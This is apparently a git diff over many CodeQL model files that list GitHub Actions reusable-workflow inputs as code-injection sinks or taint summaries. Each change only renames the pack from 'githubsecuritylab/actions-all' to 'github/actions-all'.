+++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index ff0695c0ef2..43e99341717 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9576ce3892a..cc5fb5c8d57 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index b78d6118411..64ca7805d90 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index cbe56806056..eab60f25238 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 391bbc6aacb..fc91813e01b 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index f8b490726da..253c82f4bef 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 889499eea3d..eb1b3df774d 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 2dce19050ed..3c6e1aaf658 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] 
@@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index c80f8e732b6..3f66f287830 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b85a11d81f2..b45eabdf202 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index f8102400cc7..76bb69800a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 1af7b832203..9af37394143 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index c0688a4a5e0..9d0113eb8ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 4e91308a004..90ad3c0f9a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index bc42c619599..e07d783ae53 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 68925b294bb..3d698b0a84b 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index c3ff42ed604..364bd19139e 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 964436f33ca..85d150cf11c 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 995940550e1..612a114d79c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 93653f07819..86267e5a921 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 961070778cf..31d0192f3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9f1cc82523c..5116c943f69 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 68babc09b6a..85cb45df895 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index f4271e5424b..4167f4bb982 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index f20f7997d3c..04b9325cecd 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index da5617fd144..60b966d98a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 78821b4dad3..bbca585931c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index f0c9290ca22..a0b7c418967 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 21d23698931..663826781e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index ac38cac602d..c0b8992a678 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a9f87db955e..a7069a8fa4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 99c706b0c28..3ec3c008301 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f8d0172d684..f4c09189ba6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 5afda471f8b..46b715358e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4e5ca50ccec..ca728bfced2 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 02801615bd5..c31b5c8fe0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index d808d612857..e53c0a2780b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index e543dc8b7f3..2c904674125 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index 891d902f470..cff10b709e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 334d64dfbec..31e4dbbf7ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 2c600cd7f7d..5aca8a7070d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index cc6c4e620e6..179c882eba1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index efbf050ddc9..a702bdd4784 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 9860bd3ab92..105a5b49f3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index c160c29f6f6..4e4aa9f7986 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 910715eece0..4272f3376ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] 
@@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index f04e67670d3..4752bce29b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 3d5fa057987..e493955ca4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml 
